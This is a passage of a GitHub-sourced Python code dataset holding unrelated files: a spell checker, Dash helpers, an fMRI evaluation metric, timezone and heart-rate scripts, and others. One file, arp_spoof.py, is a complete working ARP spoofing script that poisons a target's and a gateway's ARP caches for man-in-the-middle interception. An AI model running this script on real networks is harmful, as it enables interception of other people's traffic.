self.turtle.color(*args)\n\n async def pencolor(self, *args):\n self.turtle.color(*args)\n\n async def fillcolor(self, *args):\n self.turtle.fillcolor(*args)\n\n async def begin_fill(self):\n self.turtle.begin_fill()\n\n async def end_fill(self):\n self.turtle.end_fill()\n\n async def penup(self):\n self.turtle.penup()\n\n async def pendown(self):\n self.turtle.pendown()\n\n async def speed(self, speed):\n self.turtle.speed(speed)\n\n async def shape(self, shape):\n self.turtle.shape(shape)\n\nclass Screen:\n def __init__(self):\n self.turtle = window.getTurtle(\"canvas\")\n \n def bgcolor(self, *args):\n self.turtle.bgcolor(*args)","repo_name":"edublocks/edublocks-pyscript","sub_path":"turtle.py","file_name":"turtle.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"43141316662","text":"import os\nimport base64\nimport io\nimport pandas as pd\n\nfrom dash import html, dash_table\n\ndef get_subdict(lst_of_dict: list, title):\n for dct in lst_of_dict:\n if dct['title'] == title:\n return dct\n\ndef get_tree_data(path):\n tree = os.walk(path)\n d_q = []\n for element in tree:\n d_q.append(element)\n\n l = []\n for a, b, c in d_q:\n di = {'title': a.split('\\\\')[-1], 'key': a}\n\n if c:\n c = [{'title': c_file.replace('_', ' ').partition('.')[0], 'key': os.path.join(a, c_file)} for c_file in c]\n things = [b, c]\n if any(thing for thing in things):\n di['children'] = things\n\n l.append(di)\n\n dirs = []\n for i in l:\n if (i.get('children')):\n if i.get('children')[0]:\n dirs.append(i)\n else:\n i['children'] = i.get('children')[1]\n dirs.reverse()\n\n for _dirs in dirs:\n child_list = [get_subdict(l, d) for d in _dirs.get('children')[0]]\n if _dirs['children'][1]:\n for i in _dirs['children'][1]:\n child_list.append(i)\n _dirs['children'] = child_list\n\n tree_dirs = dirs[-1]\n return tree_dirs\n\n\n\ndef parse_contents(contents, filename, med_serv):\n content_type, content_string = contents.split(',')\n\n global df\n decoded = base64.b64decode(content_string)\n try:\n if 'csv' in filename:\n df = pd.read_csv(\n io.StringIO(decoded.decode('utf-8')))\n elif 'xls' in filename:\n df = pd.read_excel(io.BytesIO(decoded))\n except Exception as e:\n print(e)\n\n if med_serv == 'hosp':\n df.to_excel(r'C:\\Users\\anna.muraveva\\Documents\\SAS\\rule_engine\\Услуги_hosp.xlsx', index=False)\n else:\n df.to_excel(r'C:\\Users\\anna.muraveva\\Documents\\SAS\\rule_engine\\Услуги_dent.xlsx', index=False)\n\n\ndef creat_table(df_output):\n return html.Div([\n dash_table.DataTable(\n data=df_output.to_dict('records'),\n columns=[{'name': i, 'id': i} for i in df_output.columns],\n style_data={\n # 'whiteSpace': 'normal',\n 'height': 'auto',\n 'lineHeight': '10px',\n 'minWidth': '180px', 'width': '180px', 'maxWidth': '300px',\n },\n\n tooltip_data=[\n {\n column: {'value': str(value), 'type': 'markdown'}\n for column, value in row.items()\n } for row in df_output.to_dict('records')\n ],\n tooltip_duration=None,\n\n style_cell={'textAlign': 'left',\n 'textOverflow': 'ellipsis',} # left align text in columns for readability\n ),\n ]\n )","repo_name":"Anna-Mur/web_interface_by_python","sub_path":"funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":2872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"29317369000","text":"# -*- coding: UTF-8 -*-\n\"\"\"\n@author: WanZhiWen \n@file: SpellCheckBayesian.py \n@time: 2017-12-24 
15:50\n\n使用贝叶斯方法实现拼写检查\n\"\"\"\nimport re\nimport collections\n\n\n# 求解:argmaxc P(c|w) -> argmaxc P(w|c)P(c)/P(w)\n# P(c),文章中出现一个正确拼写词c的概率,也就是说,c出现的概率有多大\n# P(w|c),在用户想键入c的情况下敲成w的概率,这个代表用户会以多大的概率把c敲错成w\n# argmaxc,用来枚举所有可能的c并且选择概率最大的\n\n# 将语料库中的单词全部抽取出来,转换成小写,并且去除单词中间的特殊符号\ndef words(text):\n return re.findall(\"[a-z]+\", text.lower())\n\n\n# 统计语料库中每个单词出现的频数\ndef train(features):\n # 使用lambda: 1是为了当出现一个语料库中没有的单词时,model这个字典会输出1,而不会输出0\n model = collections.defaultdict(lambda: 1)\n for f in features:\n model[f] += 1\n return model\n\n\nNWORDS = train(words(open(\"words.txt\").read()))\n\n# 编辑距离:定义为使用了几次插入(在词中插入一个单字母), 删除(删除一个单字母), 交换(交换相邻两个字母),\n# 替换(把一个字母换成另一个)的操作从一个词变到另一个词.\n\nalphabet = 'abcdefghijklmnopqrstuvwxyz'\n\n\n# 对于一个长度为 n 的单词, 可能有n种删除, n-1中对换, 26n 种\n# (译注: 实际上是 25n 种)替换 和 26(n+1) 种插入 (译注: 实际上比这个小, 因为在一个字母前后再插入这个字母构成的词是等价的).\n# 这样的话, 一共就是 54n + 25 中情况 (当中还有一点重复).\n# 比如说, 和 something 这个单词的编辑距离为1 的词按照这个算来是 511 个, 而实际上是 494 个.\n# 返回所有与单词 w 编辑距离为 1 的集合\ndef edits1(word):\n n = len(word)\n return set([word[0:i] + word[i + 1:] for i in range(n)] + # deletion\n [word[0:i] + word[i + 1] + word[i] + word[i + 2:] for i in range(n - 1)] + # transposition\n [word[0:i] + c + word[i + 1:] for i in range(n) for c in alphabet] + # alteration\n [word[0:i] + c + word[i:] for i in range(n + 1) for c in alphabet]) # insertion\n\n\n# 返回所有与单词 w 编辑距离为 2 的集合\n# 与 something 编辑距离为2的单词居然达到了 114,324 个\n# 优化:在这些编辑距离小于2的词中间, 只把那些正确的词作为候选词, known_edits2('something') 只能返回 3 个单词: 'smoothing', 'something' 和 'soothing'\ndef known_edits2(word):\n return set(e2 for e1 in edits1(word) for e2 in edits1(e1) if e2 in NWORDS)\n\n\n# known()函数接受一个单词的集合��将这个单词集合中错误的单词去掉\ndef known(words):\n return set(w for w in words if w in NWORDS)\n\n\n# 如果known(set)非空,candidates就会选取这个集合,而不会计算后面的\n# 这里选择:编辑距离为0的正确单词比编辑距离为1的优先级高,而编辑距离为1的正确单词比编辑距离为2的优先级高\ndef correct(word):\n # 如果or关键字中前面有非空值,就不会再计算后面的\n candidates = known([word]) or known(edits1(word)) or known_edits2(word) or [word]\n # NWORDS[w]越大,说明该单词w出现的频数越多,则P(w)越大\n # 对于传进来的单词word,如果该单词本身就是正确的,则candidates=[word],这时直接输出这个单词即可\n # 如果传进来的单词是经过一次编辑距离得到的错误单词,如tha,则经过known(edits1(word))处理后,\n # 就会出现the、than等正确的单词,并且由于这些正确的单词都是tha经过一次编辑距离得到的,\n # 即这些单词的P(w|c)都是相同的,则只要选出这些单词中NWORDS[w]最大的单词,就是我们所需要的P(w|c)P(c)最大的单词了\n return max(candidates, key=lambda w: NWORDS[w])\n\n\nwhile True:\n print(\"请输入单词:\")\n word = input()\n if word == \"q\":\n break\n else:\n print(\"可能的正确单词是:\", correct(word))\n","repo_name":"xiaoxiaopingzi/DeepLearning","sub_path":"ClassicAlgorithm/SpellCheckBayesian.py","file_name":"SpellCheckBayesian.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"20604351229","text":"import numpy as np\nfrom nibabel.freesurfer.mghformat import load\nfrom tqdm import tqdm\nfrom scipy.stats import pearsonr as corr\nimport os \n\ndef median_squared_noisenorm_correlation(lh_fmri_val_pred, \n rh_fmri_val_pred,\n lh_fmri_val,\n rh_fmri_val,\n data_dir,\n ncsnr_dir,\n images_trials_dir,\n idxs_val):\n ## Compute the correlation between the predicted and actual fMRI data ##\n print('Computing the correlation between the predicted and actual fMRI data...')\n # Empty correlation array of shape: (LH vertices)\n lh_correlation = np.zeros(lh_fmri_val_pred.shape[1])\n # Correlate each predicted LH vertex with the corresponding ground truth vertex\n for v in tqdm(range(lh_fmri_val_pred.shape[1])):\n lh_correlation[v] = corr(lh_fmri_val_pred[:,v], lh_fmri_val[:,v])[0] # 0 per selezionare valore e 
non p-value\n\n # Empty correlation array of shape: (RH vertices)\n rh_correlation = np.zeros(rh_fmri_val_pred.shape[1])\n # Correlate each predicted RH vertex with the corresponding ground truth vertex\n for v in tqdm(range(rh_fmri_val_pred.shape[1])):\n rh_correlation[v] = corr(rh_fmri_val_pred[:,v], rh_fmri_val[:,v])[0]\n\n ## Evaluate the model ##\n # NCSNR\n lh_ncsnr = load(os.path.join(ncsnr_dir, 'lh.ncsnr.mgh'))\n rh_ncsnr = load(os.path.join(ncsnr_dir, 'rh.ncsnr.mgh'))\n lh_ncsnr_all_vertices = lh_ncsnr.get_fdata()[:,0,0]\n rh_ncsnr_all_vertices = rh_ncsnr.get_fdata()[:,0,0]\n # fsaverage\n hemisphere = ['left', 'right'] #@param ['left', 'right'] {allow-input: true}\n # Load the brain surface map of all vertices\n roi_dir = os.path.join(data_dir, 'roi_masks',\n hemisphere[0][0]+'h.all-vertices_fsaverage_space.npy')\n lh_fsaverage_all_vertices = np.load(roi_dir)\n roi_dir = os.path.join(data_dir, 'roi_masks',\n hemisphere[1][0]+'h.all-vertices_fsaverage_space.npy')\n rh_fsaverage_all_vertices = np.load(roi_dir)\n # NCSNR for challenge vertices\n lh_ncsnr_challenge_vertices = lh_ncsnr_all_vertices[np.where(lh_fsaverage_all_vertices)[0]]\n rh_ncsnr_challenge_vertices = rh_ncsnr_all_vertices[np.where(rh_fsaverage_all_vertices)[0]]\n # TRIALS\n image_trial_number = np.load(os.path.join(images_trials_dir, 'train_images_trials.npy'))\n image_trial_number_val = image_trial_number[idxs_val]\n # Compute Noise Ceiling from NCSNR and TRIALS\n A = len(image_trial_number_val[image_trial_number_val == 3])\n B = len(image_trial_number_val[image_trial_number_val == 2])\n C = len(image_trial_number_val[image_trial_number_val == 1])\n lh_noise_ceiling = (lh_ncsnr_challenge_vertices ** 2) / ((lh_ncsnr_challenge_vertices ** 2) + ((A/3 + B/2 + C/1) / (A + B + C)))\n rh_noise_ceiling = (rh_ncsnr_challenge_vertices ** 2) / ((rh_ncsnr_challenge_vertices ** 2) + ((A/3 + B/2 + C/1) / (A + B + C)))\n # Compute Noise Normalized Squared Correlation\n \n # \"Xh_correlation\" are 1-D vectors with the correlation scores of all vertices\n # of a given Challenge subject (each component corresponds to the correlation\n # score of a vertex).\n\n # \"Xh_noise_ceiling\" are 1-D vectors with the noise ceiling values of all\n # vertices of a given Challenge subject (each component corresponds to the noise\n # ceiling value of a vertex).\n \n # Set negative correlation values to 0, so to keep the noise-normalized\n # encoding accuracy positive\n lh_correlation[lh_correlation<0] = 0\n rh_correlation[rh_correlation<0] = 0\n # Square the correlation values\n lh_correlation = lh_correlation ** 2\n rh_correlation = rh_correlation ** 2\n # Add a very small number to noise ceiling values of 0, otherwise the\n # noise-normalized encoding accuracy cannot be calculated (division by 0 is\n # not possible)\n lh_noise_ceiling[lh_noise_ceiling==0] = 1e-14\n rh_noise_ceiling[rh_noise_ceiling==0] = 1e-14\n # Compute the noise-normalized encoding accuracy\n lh_noise_norm_corr = np.divide(lh_correlation, lh_noise_ceiling)\n rh_noise_norm_corr = np.divide(rh_correlation, rh_noise_ceiling)\n # Set the noise-normalized encoding accuracy to 1 (100% accuracy) for those\n # vertices in which the correlation is higher than the noise ceiling, to prevent\n # encoding accuracy values higher than 100%\n lh_noise_norm_corr[lh_noise_norm_corr>1] = 1\n rh_noise_norm_corr[rh_noise_norm_corr>1] = 1\n \n return lh_noise_norm_corr, 
rh_noise_norm_corr\n\n\n","repo_name":"giocoal/algonauts2023-image-to-fMRI-BOLD-activations-encoding-models","sub_path":"src/evaluation_metrics.py","file_name":"evaluation_metrics.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"38215579646","text":"#!usr/bin/env python\r\n\r\nimport scapy.all as scapy\r\nimport time\r\nimport argparse\r\n\r\ndef get_arguments():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-t\", \"--target\", dest=\"target\", help=\"Ip you want to scan\")\r\n options = parser.parse_args()\r\n return options\r\n\r\ndef scan(ip):\r\n arp_request = scapy.ARP(pdst=ip)\r\n broadcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\r\n arp_request_broadcast = broadcast/arp_request\r\n answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]\r\n\r\n clients_list = []\r\n for element in answered_list:\r\n client_dict = {\"ip\": element[1].psrc, \"mac\": element[1].hwsrc}\r\n clients_list.append(client_dict)\r\n return clients_list\r\n\r\ndef print_result(results_list):\r\n print(\"------------------------------------------------------------------------------\")\r\n print(\"IP\\t\\t\\tMAC Address\\n------------------------------------------------------------------------------\")\r\n for client in results_list:\r\n print(client[\"ip\"] + \"\\t\\t\" + client[\"mac\"])\r\n\r\noptions = get_arguments()\r\nscan_result = scan(options.target)\r\nprint_result(scan_result)\r\n\r\ntarget_ip = input(\"Please enter the targets IP address:\")\r\ngateway_ip = input(\"Please enter the gateway:\")\r\n\r\ndef get_mac(ip):\r\n arp_request = scapy.ARP(pdst=ip)\r\n broadcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\r\n arp_request_broadcast = broadcast/arp_request\r\n answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]\r\n return answered_list[0][1].hwsrc\r\n\r\ndef spoof(target_ip, spoof_ip):\r\n target_mac = get_mac(target_ip)\r\n packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)\r\n scapy.send(packet, verbose=False)\r\n\r\ndef restore(destination_ip, source_ip):\r\n destination_mac = get_mac(destination_ip)\r\n source_mac = get_mac(source_ip)\r\n packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)\r\n scapy.send(packet, count=4, verbose=False)\r\n\r\n\r\n\r\ntry:\r\n sent_packet_count = 0\r\n while True:\r\n spoof(target_ip, gateway_ip )\r\n spoof(gateway_ip, target_ip)\r\n sent_packet_count = sent_packet_count + 2\r\n print(\"\\r[+] Packets sent: \" + str(sent_packet_count), end=\"\")\r\n time.sleep(2)\r\nexcept KeyboardInterrupt:\r\n print(\"[+] Detected CTRL + C ....... Resetting ARP table..... Please wait\")\r\n restore(target_ip, gateway_ip)\r\n restore(gateway_ip, target_ip)","repo_name":"icebowl/python","sub_path":"connor/arp_spoof.py","file_name":"arp_spoof.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"19919950670","text":"'''Verificar se os batimentos cardíacos por minuto se encontram na faixa adequada. Para isso, você deve solicitar ao usuário que informe o seu número de\nBATIMENTOS POR MINUTO (BPM) e a IDADE. 
A partir disso,o script deve verificar e exibir uma mensagem informando se os batimentos do usuário \nencontram-se DENTRO da faixa adequada, ACIMA da faixa adequada ou ABAIXO da faixa adequada, de acordo com o site Tua Saúde'''\n\n'''Até 2 anos de idade: 120 a 140 bpm,\nEntre 8 anos até 17 anos: 80 a 100 bpm,\nAdulto entre 18 até 60 anos: 70 a 80 bpm,\nIdosos acima de 60 anos: 50 a 60 bpm.'''\n\nprint (\"Verificador de frequências cardácas\")\nidade = int(input(\"Por favor, informe a sua idade \"))\nbpm = int(input(\"Por favor, informe seu número de batimentos por minuto (BPM) \"))\n\natividade_fisica = (\"Você pratica atividade física? (s/n)\")\n\nif idade <= 2:\n if bpm >= 120:\n if bpm <= 140:\n print (\"Frequência cardíaca dentro da faixa adequada\")\n else:\n print (\"Frequência cardíaca acima da faixa adequada\")\n else:\n print (\"Frequência cardíaca abaixo da faixa adequada\") \nelif idade >= 8 and idade <= 17:\n if bpm >= 80:\n if bpm <= 100:\n print (\"Frequência cardíaca dentro da faixa adequada\")\n else:\n print (\"Frequência cardíaca acima da faixa adequada\")\n else:\n print (\"Frequência cardíaca abaixo da faixa adequada\")\nelif idade >= 18 and idade <= 60:\n if bpm >= 70:\n if bpm <= 80:\n print (\"Frequência cardíaca dentro da faixa adequada\")\n else:\n print (\"Frequência cardíaca acima da faixa adequada\")\n else:\n print (\"Frequência cardíaca abaixo da faixa adequada\")\nelif idade >= 60:\n if bpm >= 50:\n if bpm <= 60:\n print (\"Frequência cardíaca dentro da faixa adequada\")\n else:\n print (\"Frequência cardíaca acima da faixa adequada\")\n else:\n print (\"Frequência cardíaca abaixo da faixa adequada\")\nelse:\n print (\"Não foi possível verificar os batimentos para essa idade\")\n\n\n \n \n\n\n \n ","repo_name":"VanessaSambrana/Python","sub_path":"BPM.py","file_name":"BPM.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"3965256867","text":"from datetime import datetime , timedelta\r\nfrom pytz import timezone\r\nfrom colored import fg, bg, attr\r\n\r\n\r\nBangkok = timezone('Asia/Bangkok')\r\nbkk =datetime.now(Bangkok)\r\nprint (\"Time in Bangkok is : \" +\r\n bkk.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' + ' sec' ))\r\nprint('\\n')\r\n\r\n\r\n\r\nygn = bkk + timedelta(minutes= - 30 )\r\n#ygn = timedelta(minutes=ygn.minute % 10)\r\nprint (\"Time in Yangon is : \" +\r\n ygn.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' + ' sec'))\r\nprint('\\n')\r\n\r\n\r\n#datetime.strptime(Bangkok, '%H:%M:%S')\r\n\r\n\r\n#Yangon = datetime.date(Bangkok) + dt\r\n\r\n\r\nhawaii = timezone('US/Hawaii')\r\nhw = datetime.now(hawaii)\r\nprint(\"Time in Hawaii is : \" +\r\n hw.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' + ' sec'))\r\nprint('\\n')\r\n\r\nSeoul = timezone('Asia/Seoul')\r\nSe = datetime.now(Seoul)\r\nprint(\"Time in Seoul is : \" + \r\n Se.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' + ' sec'))\r\nprint('\\n')\r\n\r\n\r\nShanghai = timezone('Asia/Shanghai')\r\nsh = datetime.now(Shanghai)\r\nprint(\"Time in Shanghai is : \" + \r\n sh.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' + ' sec'))\r\nprint('\\n')\r\n\r\n\r\nTokyo = timezone('Asia/Tokyo')\r\nty = datetime.now(Tokyo)\r\nprint(\r\n \"Time in Tokyo is : \" +\r\n ty.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' + ' sec'))\r\nprint('\\n')\r\n\r\n\r\nSydney = timezone('Australia/Sydney')\r\nsyd = datetime.now(Sydney)\r\nprint(\"Time in Sydney is : \" +\r\n syd.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' 
+ ' sec'))\r\nprint('\\n')\r\n \r\n\r\nLondon = timezone('Europe/London')\r\nLndn = datetime.now(London)\r\n\r\nprint( \"Time in London is : \" +\r\n Lndn.strftime('%H '+ 'hour ' '%M '+ 'min ' + '%S ' + ' sec'))\r\n\r\n\r\n","repo_name":"baa256/Py-Projects","sub_path":"differentTimeZones.py","file_name":"differentTimeZones.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"15931772978","text":"import sys\n\nsys.stdin = open(\"input.txt\", \"r\")\n# 왼쪽에 둘거나 오른쪽에 둘거냐 안놓을거냐\n\ndef DFS(L, sum):\n global res\n if L == k:\n if S >= sum > 0:\n res.add(sum)\n else:\n DFS(L+1, sum+p[L])\n DFS(L+1, sum-p[L])\n DFS(L+1, sum)\n\nif __name__ == \"__main__\":\n k = int(input())\n p = list(map(int, input().split()))\n S = sum(p)\n res = set()\n DFS(0, 0)\n print(S - len(res))\n\n","repo_name":"Kosanseong/coding_test","sub_path":"test/BFSDFS/양팔저울.py","file_name":"양팔저울.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"28393265227","text":"import sys\nfrom PyQt4 import QtGui, QtCore\nimport time\nimport random\nimport socket\nimport urlparse\nimport httplib \n \nclass Main(QtGui.QMainWindow):\n def __init__(self, parent=None):\n super(Main, self).__init__(parent)\n self.text_area = QtGui.QTextBrowser()\n self.thread_button = QtGui.QPushButton('Start threads')\n self.thread_button.clicked.connect(self.start_threads)\n \n central_widget = QtGui.QWidget()\n central_layout = QtGui.QHBoxLayout()\n central_layout.addWidget(self.text_area)\n central_layout.addWidget(self.thread_button)\n central_widget.setLayout(central_layout)\n self.setCentralWidget(central_widget)\n \n \n def start_threads(self):\n if self.isrun==False:\n self.thread = MyThread(self) # create a thread\n self.thread.trigger.connect(self.update_text) # connect to it's signal\n self.thread.setup('', 8000) # just setting up a parameter\n self.thread.start() # start the thread\n self.thread.isAlive=True\n else:\n self.thread.isAlive=False\n self.isrun=False\n \n def update_text(self, thread_no):\n self.text_area.append('%s' % thread_no)\n \nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n \n mainwindow = Main()\n mainwindow.show()\n \n sys.exit(app.exec_())\n","repo_name":"JoeChen999/proto","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"9555969951","text":"\n#Use the following strings in your prompts and print statements\n\"\\nError. Please try again\"\n\"Enter a file name: \"\n\"\\n\\nGross Domestic Product\"\n\n#Use these contansts when displaying the results\nHEADER_FORMAT = \"{:<10s}{:>8s}{:>6s}{:>18s}\"\nDATA_FORMAT = \"{:<10s}{:>8.1f}{:>6d}{:>18.2f}\"\n\ndef open_file():\n ''' Docstring'''\n while True:\n file_name = input(\"Enter a file name: \")\n try:\n fp = open(file_name, \"r\")\n return fp\n except FileNotFoundError:\n print(\"Error. 
Please try again\")\n \ndef find_min_percent(line):\n ''' Docstring'''\n\n min_value = float(line[76:76 + 12].strip())\n min_index = 0\n for i in range(47):\n start = 76 + i * 12\n end = start + 12\n value = float(line[start:end].strip())\n if value < min_value:\n min_value = value\n min_index = i\n return min_value, min_index\n\ndef find_max_percent(line):\n ''' Docstring'''\n\n max_value = float(line[76:76 + 12].strip())\n max_index = 0\n for i in range(47):\n start = 76 + i * 12\n end = start + 12\n value = float(line[start:end].strip())\n if value > max_value:\n max_value = value\n max_index = i\n return max_value, max_index\n\ndef find_gdp(line, index):\n ''' Docstring'''\n\n start = 76 + index * 12\n end = start + 12\n return float(line[start:end].strip()) / 1000\n\n\ndef display(min_val, min_year, min_val_gdp, max_val, max_year, max_val_gdp):\n ''' Docstring'''\n\n print(\"\")\n print(\"Gross Domestic Product\")\n print(\"{:<10s}{:>8s}{:>6s}{:>18s}\".format(\"min/max\", \"change\", \"year\", \"GDP (trillions)\"))\n print(\"{:<10s}{:>8.1f}{:>6d}{:>18.2f}\".format(\"min\", min_val, min_year, min_val_gdp))\n print(\"{:<10s}{:>8.1f}{:>6d}{:>18.2f}\".format(\"max\", max_val, max_year, max_val_gdp))\n\n\ndef main():\n fp = open_file()\n lines = fp.readlines()\n line_9 = lines[9 - 1]\n line_44 = lines[44 - 1]\n start_year = 1969\n min_val, min_index = find_min_percent(line_9)\n min_year = start_year + min_index\n min_val_gdp = find_gdp(line_44, min_index)\n max_val, max_index = find_max_percent(line_9)\n max_year = start_year + max_index\n max_val_gdp = find_gdp(line_44, max_index)\n display(min_val, min_year, min_val_gdp, max_val, max_year, max_val_gdp)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MSU-coder/CSE231-MSU2023SUMMER","sub_path":"Project03/proj03.py","file_name":"proj03.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"28389883816","text":"# -*- coding: utf-8 -*-\n\"\"\"\nvk_url_parser.py\n~~~~~~~~~~~~~~~~~\n\nParsing image url from VK\n\"\"\"\nimport io\nimport os\nimport time\nimport filelock\n\nimport requests\nimport pandas as pd\nfrom hdfs import InsecureClient\nfrom vk_common.common_python import get_logger\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\n\nclass Watcher:\n\n def __init__(self, watch_directory: str):\n self.__log = get_logger(self.__class__.__name__)\n self.observer = Observer()\n self.watchDirectory = watch_directory\n\n def run(self, fs_mode: str, write_mode: str):\n \"\"\"\n\n :param fs_mode: listfile | watchdog\n :param write_mode: hdfs | local\n \"\"\"\n self.__log.info(f\"Starting url parser in mode {fs_mode} for a directory {self.watchDirectory}\")\n event_handler = VkUrlHandler(self.watchDirectory, write_mode=write_mode)\n if fs_mode == \"watchdog\":\n self.observer.schedule(event_handler, self.watchDirectory, recursive=False)\n self.observer.start()\n try:\n while True:\n time.sleep(5)\n except:\n self.observer.stop()\n self.__log.info(\"Observer Stopped\")\n\n self.observer.join()\n elif fs_mode == \"listfile\":\n try:\n while True:\n list_files = os.listdir(self.watchDirectory)\n list_files.sort(key=lambda f: os.path.getmtime(os.path.join(self.watchDirectory, f)))\n for file_name in list_files:\n if file_name.startswith(\"part\") and file_name.split(\".\")[-1] == \"parquet\":\n path_to_file = os.path.join(self.watchDirectory, file_name)\n self.__log.debug(file_name)\n try:\n 
event_handler.parse_parquet(path_to_file)\n except filelock._error.Timeout:\n self.__log.debug(f\"Skip file: {file_name}, file processing\")\n except FileNotFoundError:\n self.__log.debug(f\"Skip file: {file_name}, file read\")\n except Exception as e:\n self.__log.warn(f\"Error while parsing parquet: {e}\")\n self.__log.debug(\"Waiting new parquet file\")\n time.sleep(15)\n except Exception as e:\n self.__log.error(e)\n except KeyboardInterrupt:\n self.__log.info(\"Reading list files stopped\")\n return 0\n\n\nclass VkUrlHandler(FileSystemEventHandler):\n \"\"\"\n URL image parser from VK\n \"\"\"\n def __init__(self, watch_directory: str, write_mode: str = \"local\"):\n self.__log = get_logger(self.__class__.__name__)\n self.watchDirectory = watch_directory\n self.write_mode = write_mode\n hdfs_host = os.getenv(\"HDFS_HOST\", \"10.32.7.103\")\n hdfs_port = os.getenv(\"HDFS_PORT\", \"31179\")\n # need to upload active node\n self.hdfs_client = InsecureClient(f'http://{hdfs_host}:{hdfs_port}', user='jusergeeva-242388')\n self.hdfs_dir = os.getenv(\"HDFS_DIR\", \"/tmp/jusergeeva-242388/project\")\n\n def on_any_event(self, event):\n \"\"\"\n Watchdog feature\n\n :param event: create | move | modify | delete file in system\n \"\"\"\n if event.is_directory:\n return None\n elif event.event_type == 'moved' or event.event_type == 'created':\n path_to_file = event.src_path\n file_name = path_to_file.split(os.sep)[-1]\n if file_name.startswith(\"part\") and file_name.split(\".\")[-1] == \"parquet\":\n path_to_file = os.path.join(self.watchDirectory, file_name)\n self.__log.debug(f\"Watchdog received created event - {path_to_file}\")\n self.parse_parquet(path_to_file)\n\n def parse_parquet(self, path: str) -> None:\n \"\"\"\n Parse parquet file with links to images\n\n :param path: path to parquet file\n \"\"\"\n file_name = path.split(os.sep)[-1]\n lockfile_name = \".\" + file_name.split(\".\")[0] + \".lock\"\n lockfile =os.path.join(self.watchDirectory, lockfile_name)\n with filelock.FileLock(lock_file=lockfile, timeout=10):\n df = pd.read_parquet(path, engine=\"pyarrow\")\n for item in df.to_dict('records'):\n self.image_download(url=item[\"link\"], target=item[\"target\"], id=item[\"id\"],\n id_increment=item[\"id_increment\"])\n self.__log.debug(df.head())\n os.remove(path)\n os.remove(lockfile)\n self.__log.debug(f\"End process file: {path.split(os.sep)[-1]}\")\n\n def image_download(self, url: str, target: str, id: int, id_increment: int) -> None:\n \"\"\"\n Download image and save locally | to hdfs\n\n :param url: image url\n :param target: image group type (photo|painting)\n :param id: image number from source\n :param id_increment: id post from db\n \"\"\"\n self.__log.debug(f\"Start parse: id_increment={id_increment}, image_id={id}\")\n image_path = f\"data/images/{target}_2/img_{id}.jpg\"\n if self.write_mode == \"local\":\n os.makedirs(os.path.dirname(image_path), exist_ok=True)\n time.sleep(0.2)\n try:\n img_data = requests.get(url).content\n with open(image_path, 'wb') as img_handler:\n img_handler.write(img_data)\n except requests.exceptions.ConnectionError as e:\n self.__log.error(e)\n return None\n elif self.write_mode == \"hdfs\":\n time.sleep(0.2)\n image_path = os.path.join(self.hdfs_dir, f\"{target}_2\", f\"img_{id}.jpg\")\n try:\n img_data = requests.get(url).content\n # save image to hdfs\n with self.hdfs_client.write(image_path, overwrite=True) as img_handler:\n img_handler.write(img_data)\n except requests.exceptions.ConnectionError as e:\n self.__log.error(e)\n return 
None\n","repo_name":"Emidiant/vk-group-post-parser","sub_path":"url_parser/vk_url_parser.py","file_name":"vk_url_parser.py","file_ext":"py","file_size_in_byte":6297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"72942568379","text":"import unittest\n\nimport mock\n\nfrom google.cloud.storage.retry import DEFAULT_RETRY\nfrom google.cloud.storage.retry import DEFAULT_RETRY_IF_METAGENERATION_SPECIFIED\n\nGCCL_INVOCATION_TEST_CONST = \"gccl-invocation-id/test-invocation-123\"\n\n\nclass Test__get_storage_host(unittest.TestCase):\n @staticmethod\n def _call_fut():\n from google.cloud.storage._helpers import _get_storage_host\n\n return _get_storage_host()\n\n def test_wo_env_var(self):\n from google.cloud.storage._helpers import _DEFAULT_STORAGE_HOST\n\n with mock.patch(\"os.environ\", {}):\n host = self._call_fut()\n\n self.assertEqual(host, _DEFAULT_STORAGE_HOST)\n\n def test_w_env_var(self):\n from google.cloud.storage._helpers import STORAGE_EMULATOR_ENV_VAR\n\n HOST = \"https://api.example.com\"\n\n with mock.patch(\"os.environ\", 